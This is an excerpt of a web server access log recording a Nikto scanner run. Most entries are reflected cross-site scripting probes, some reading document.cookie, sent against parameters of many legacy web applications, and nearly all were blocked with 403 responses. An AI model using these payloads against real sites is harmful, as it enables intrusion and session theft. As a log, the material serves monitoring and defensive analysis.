  1285. 84.56.69.222 - - [23/Oct/2013:15:40:54 +0400] "POST /servlet/custMsg?guestName=<script>alert(\\\"Vulnerable\\\")</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000791)"
  1286. 84.56.69.222 - - [23/Oct/2013:15:40:54 +0400] "POST /servlet/CookieExample?cookiename=<script>alert(\\\"Vulnerable\\\")</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000792)"
  1287. 84.56.69.222 - - [23/Oct/2013:15:40:54 +0400] "GET /servlet/ContentServer?pagename=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000793)"
  1288. 84.56.69.222 - - [23/Oct/2013:15:40:55 +0400] "GET /search/index.cfm?<script>alert(\\\"Vulnerable\\\")</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000794)"
  1289. 84.56.69.222 - - [23/Oct/2013:15:40:56 +0400] "GET /search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000795)"
  1290. 84.56.69.222 - - [23/Oct/2013:15:40:56 +0400] "GET /search.php?zoom_query=<script>alert(\\\"hello\\\")</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000796)"
  1291. 84.56.69.222 - - [23/Oct/2013:15:40:57 +0400] "GET /search.php?searchstring=<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000797)"
  1292. 84.56.69.222 - - [23/Oct/2013:15:41:04 +0400] "GET /search.php?searchfor=\\\"><script>alert(1776)</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000798)"
  1293. 84.56.69.222 - - [23/Oct/2013:15:41:04 +0400] "GET /search.asp?term=<%00script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000799)"
  1294. 84.56.69.222 - - [23/Oct/2013:15:41:05 +0400] "GET /script>alert('Vulnerable')</script>.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000800)"
  1295. 84.56.69.222 - - [23/Oct/2013:15:41:36 +0400] "GET /replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000802)"
  1296. 84.56.69.222 - - [23/Oct/2013:15:41:36 +0400] "GET /profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000803)"
  1297. 84.56.69.222 - - [23/Oct/2013:15:41:36 +0400] "GET /postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\\\"%3<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000804)"
  1298. 84.56.69.222 - - [23/Oct/2013:15:41:36 +0400] "GET /postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000805)"
  1299. 84.56.69.222 - - [23/Oct/2013:15:41:36 +0400] "GET /pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000806)"
  1300. 84.56.69.222 - - [23/Oct/2013:15:41:37 +0400] "GET /pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000807)"
  1301. 84.56.69.222 - - [23/Oct/2013:15:41:37 +0400] "GET /pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000808)"
  1302. 84.56.69.222 - - [23/Oct/2013:15:41:37 +0400] "GET /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000809)"
  1303. 84.56.69.222 - - [23/Oct/2013:15:41:37 +0400] "GET /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\\\"><script>alert('Vulnerable')</script>&MMN_position=[X:X] HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000810)"
  1304. 84.56.69.222 - - [23/Oct/2013:15:41:37 +0400] "GET /phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000811)"
  1305. 84.56.69.222 - - [23/Oct/2013:15:41:38 +0400] "GET /phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000812)"
  1306. 84.56.69.222 - - [23/Oct/2013:15:41:39 +0400] "GET /phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000813)"
  1307. 84.56.69.222 - - [23/Oct/2013:15:41:50 +0400] "GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000814)"
  1308. 84.56.69.222 - - [23/Oct/2013:15:41:51 +0400] "GET /phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000815)"
  1309. 84.56.69.222 - - [23/Oct/2013:15:41:52 +0400] "GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000816)"
  1310. 84.56.69.222 - - [23/Oct/2013:15:41:52 +0400] "GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000817)"
  1311. 84.56.69.222 - - [23/Oct/2013:15:41:52 +0400] "GET /phpimageview.php?pic=javascript:alert(8754) HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000818)"
  1312. 84.56.69.222 - - [23/Oct/2013:15:41:53 +0400] "GET /phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000819)"
  1313. 84.56.69.222 - - [23/Oct/2013:15:41:53 +0400] "GET /phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000820)"
  1314. 84.56.69.222 - - [23/Oct/2013:15:41:53 +0400] "GET /phpBB/viewtopic.php?t=17071&highlight=\\\">\\\"<script>javascript:alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000821)"
  1315. 84.56.69.222 - - [23/Oct/2013:15:41:53 +0400] "GET /phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000822)"
  1316. 84.56.69.222 - - [23/Oct/2013:15:41:53 +0400] "GET /phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000823)"
  1317. 84.56.69.222 - - [23/Oct/2013:15:41:53 +0400] "GET /pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000825)"
  1318. 84.56.69.222 - - [23/Oct/2013:15:41:53 +0400] "GET /Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000826)"
  1319. 84.56.69.222 - - [23/Oct/2013:15:41:55 +0400] "GET /openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000827)"
  1320. 84.56.69.222 - - [23/Oct/2013:15:42:12 +0400] "GET /openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt; HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000828)"
  1321. 84.56.69.222 - - [23/Oct/2013:15:42:14 +0400] "GET /node/view/666\\\"><script>alert(document.domain)</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000829)"
  1322. 84.56.69.222 - - [23/Oct/2013:15:42:14 +0400] "GET /netutils/whodata.stm?sitename=<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000830)"
  1323. 84.56.69.222 - - [23/Oct/2013:15:42:15 +0400] "GET /nav/cList.php?root=</script><script>alert('Vulnerable')/<script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000831)"
  1324. 84.56.69.222 - - [23/Oct/2013:15:42:16 +0400] "GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000832)"
  1325. 84.56.69.222 - - [23/Oct/2013:15:42:16 +0400] "GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000833)"
  1326. 84.56.69.222 - - [23/Oct/2013:15:42:16 +0400] "GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000834)"
  1327. 84.56.69.222 - - [23/Oct/2013:15:42:16 +0400] "GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000835)"
  1328. 84.56.69.222 - - [23/Oct/2013:15:42:17 +0400] "GET /myhome.php?action=messages&box=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000836)"
  1329. 84.56.69.222 - - [23/Oct/2013:15:42:17 +0400] "GET /msadm/user/login.php3?account_name=\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000837)"
  1330. 84.56.69.222 - - [23/Oct/2013:15:42:18 +0400] "GET /msadm/site/index.php3?authid=\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000838)"
  1331. 84.56.69.222 - - [23/Oct/2013:15:42:18 +0400] "GET /msadm/domain/index.php3?account_name=\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000839)"
  1332. 84.56.69.222 - - [23/Oct/2013:15:42:18 +0400] "GET /modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000840)"
  1333. 84.56.69.222 - - [23/Oct/2013:15:42:18 +0400] "GET /modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000841)"
  1334. 84.56.69.222 - - [23/Oct/2013:15:42:18 +0400] "GET /modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000842)"
  1335. 84.56.69.222 - - [23/Oct/2013:15:42:18 +0400] "GET /modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000843)"
  1336. 84.56.69.222 - - [23/Oct/2013:15:42:19 +0400] "GET /modules/Forums/bb_smilies.php?bgcolor1=\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000844)"
  1337. 84.56.69.222 - - [23/Oct/2013:15:42:19 +0400] "GET /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000845)"
  1338. 84.56.69.222 - - [23/Oct/2013:15:42:19 +0400] "GET /modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000846)"
  1339. 84.56.69.222 - - [23/Oct/2013:15:42:20 +0400] "GET /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000847)"
  1340. 84.56.69.222 - - [23/Oct/2013:15:42:20 +0400] "GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000848)"
  1341. 84.56.69.222 - - [23/Oct/2013:15:42:20 +0400] "GET /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000849)"
  1342. 84.56.69.222 - - [23/Oct/2013:15:42:20 +0400] "GET /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000850)"
  1343. 84.56.69.222 - - [23/Oct/2013:15:42:20 +0400] "GET /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000851)"
  1344. 84.56.69.222 - - [23/Oct/2013:15:42:21 +0400] "GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000852)"
  1345. 84.56.69.222 - - [23/Oct/2013:15:42:23 +0400] "GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000853)"
  1346. 84.56.69.222 - - [23/Oct/2013:15:42:23 +0400] "GET /modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script| HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000854)"
  1347. 84.56.69.222 - - [23/Oct/2013:15:42:23 +0400] "GET /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000855)"
  1348. 84.56.69.222 - - [23/Oct/2013:15:42:23 +0400] "GET /modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000856)"
  1349. 84.56.69.222 - - [23/Oct/2013:15:42:23 +0400] "GET /modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000857)"
  1350. 84.56.69.222 - - [23/Oct/2013:15:42:23 +0400] "GET /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test HTTP/1.1" 403 275 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000858)"
  1351. 84.56.69.222 - - [23/Oct/2013:15:42:24 +0400] "GET /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000859)"
  1352. 84.56.69.222 - - [23/Oct/2013:15:42:24 +0400] "GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000860)"
  1353. 84.56.69.222 - - [23/Oct/2013:15:42:24 +0400] "GET /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000861)"
  1354. 84.56.69.222 - - [23/Oct/2013:15:42:24 +0400] "GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000862)"
  1355. 84.56.69.222 - - [23/Oct/2013:15:42:24 +0400] "GET /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000863)"
  1356. 84.56.69.222 - - [23/Oct/2013:15:42:25 +0400] "GET /megabook/admin.cgi?login=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000864)"
  1357. 84.56.69.222 - - [23/Oct/2013:15:42:26 +0400] "GET /mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000865)"
  1358. 84.56.69.222 - - [23/Oct/2013:15:42:26 +0400] "GET /mailman/listinfo/<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000866)"
  1359. 84.56.69.222 - - [23/Oct/2013:15:42:26 +0400] "GET /ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\\\"Vulnerable\\\")</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000867)"
  1360. 84.56.69.222 - - [23/Oct/2013:15:42:26 +0400] "GET /launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000868)"
  1361. 84.56.69.222 - - [23/Oct/2013:15:42:27 +0400] "GET /launch.asp?NFuse_Application=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000869)"
  1362. 84.56.69.222 - - [23/Oct/2013:15:42:28 +0400] "GET /jigsaw/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000870)"
  1363. 84.56.69.222 - - [23/Oct/2013:15:42:28 +0400] "GET /isapi/testisa.dll?check1=<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000872)"
  1364. 84.56.69.222 - - [23/Oct/2013:15:42:28 +0400] "GET /index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000873)"
  1365. 84.56.69.222 - - [23/Oct/2013:15:42:29 +0400] "GET /index.php?file=Liens&op=\\\"><script>alert('Vulnerable');</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000874)"
  1366. 84.56.69.222 - - [23/Oct/2013:15:42:30 +0400] "GET /index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000875)"
  1367. 84.56.69.222 - - [23/Oct/2013:15:42:30 +0400] "GET /index.php?action=storenew&username=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000876)"
  1368. 84.56.69.222 - - [23/Oct/2013:15:42:30 +0400] "GET /index.php?action=search&searchFor=\\\"><script>alert('Vulnerable')</script > HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000877)"
  1369. 84.56.69.222 - - [23/Oct/2013:15:42:30 +0400] "GET /index.php/\\\"><script><script>alert(document.cookie)</script>< HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000878)"
  1370. 84.56.69.222 - - [23/Oct/2013:15:42:31 +0400] "GET /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000879)"
  1371. 84.56.69.222 - - [23/Oct/2013:15:42:31 +0400] "GET /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000880)"
  1372. 84.56.69.222 - - [23/Oct/2013:15:42:31 +0400] "GET /include.php?path=contact.php&contact_email=\\\">&lt;script&gt;alert(document.cookie);&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000881)"
  1373. 84.56.69.222 - - [23/Oct/2013:15:42:32 +0400] "GET /html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000882)"
  1374. 84.56.69.222 - - [23/Oct/2013:15:42:32 +0400] "GET /html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000883)"
  1375. 84.56.69.222 - - [23/Oct/2013:15:42:33 +0400] "GET /html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000884)"
  1376. 84.56.69.222 - - [23/Oct/2013:15:42:34 +0400] "GET /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000885)"
  1377. 84.56.69.222 - - [23/Oct/2013:15:42:34 +0400] "GET /gallery/search.php?searchstring=<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000886)"
  1378. 84.56.69.222 - - [23/Oct/2013:15:42:36 +0400] "GET /friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000887)"
  1379. 84.56.69.222 - - [23/Oct/2013:15:42:37 +0400] "GET /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000888)"
  1380. 84.56.69.222 - - [23/Oct/2013:15:42:37 +0400] "GET /forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000889)"
  1381. 84.56.69.222 - - [23/Oct/2013:15:42:37 +0400] "GET /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000890)"
  1382. 84.56.69.222 - - [23/Oct/2013:15:42:37 +0400] "GET /forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000891)"
  1383. 84.56.69.222 - - [23/Oct/2013:15:42:37 +0400] "GET /esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000892)"
  1384. 84.56.69.222 - - [23/Oct/2013:15:42:37 +0400] "GET /error/500error.jsp?et=1<script>alert('Vulnerable')</script>; HTTP/1.1" 404 278 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000893)"
  1385. 84.56.69.222 - - [23/Oct/2013:15:42:38 +0400] "GET /downloads/pafiledb.php?action=rate&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\" HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000894)"
  1386. 84.56.69.222 - - [23/Oct/2013:15:42:38 +0400] "GET /downloads/pafiledb.php?action=email&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\" HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000895)"
  1387. 84.56.69.222 - - [23/Oct/2013:15:42:38 +0400] "GET /downloads/pafiledb.php?action=download&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\" HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000896)"
  1388. 84.56.69.222 - - [23/Oct/2013:15:42:38 +0400] "GET /download.php?sortby=&dcategory=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000897)"
  1389. 84.56.69.222 - - [23/Oct/2013:15:42:39 +0400] "GET /default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000898)"
  1390. 84.56.69.222 - - [23/Oct/2013:15:42:39 +0400] "GET /default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000899)"
  1391. 84.56.69.222 - - [23/Oct/2013:15:42:39 +0400] "GET /comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000900)"
  1392. 84.56.69.222 - - [23/Oct/2013:15:42:39 +0400] "GET /comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000901)"
  1393. 84.56.69.222 - - [23/Oct/2013:15:42:39 +0400] "GET /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000902)"
